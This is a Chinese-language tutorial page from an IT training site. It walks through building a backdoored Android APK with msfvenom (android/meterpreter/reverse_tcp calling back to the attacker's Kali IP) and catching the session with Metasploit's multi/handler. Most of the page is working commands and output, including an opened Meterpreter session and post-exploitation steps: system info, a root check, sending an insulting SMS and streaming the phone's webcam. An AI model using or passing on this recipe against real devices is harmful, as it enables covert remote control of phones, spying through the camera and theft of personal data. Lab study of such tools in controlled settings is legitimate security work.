摘要:本文将带你了解测试工具Kali之Metasploit生成apk后门控制安卓,希望本文对大家学测试工具有所帮助。
本文将带你了解测试工具Kali之Metasploit生成apk后门控制安卓,希望本文对大家学测试工具有所帮助。
生成apk后门
Kali Linux(Hack):192.168.169.76
Android(靶机):192.168.169.137
启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes
lhost为kali的ip,lport指定一个端口。
开metasploit控制台侦听
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #对应刚才设的端口
lport => 445
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。
可以看下帮助都有啥操作
meterpreter > help
功能示例
读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。
#系统信息
meterpreter > sysinfo
Computer : localhost
OS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android
#查看root状态
meterpreter > check_root
[+] Device is rooted
#发送短信
meterpreter > send_sms
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."
OPTIONS:
-d <opt> Destination number
-dr Wait for delivery report
-h Help Banner
-t <opt> SMS body text
meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#网页视频聊天(我手机没合适浏览器没打开)
meterpreter > webcam_chat
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine
#网页摄像头视频流,显示实时画面
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...
Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓
Kali之Metasploit生成apk后门控制安卓
本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标软件测试之测试工具频道!
您输入的评论内容中包含违禁敏感词
我知道了
请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号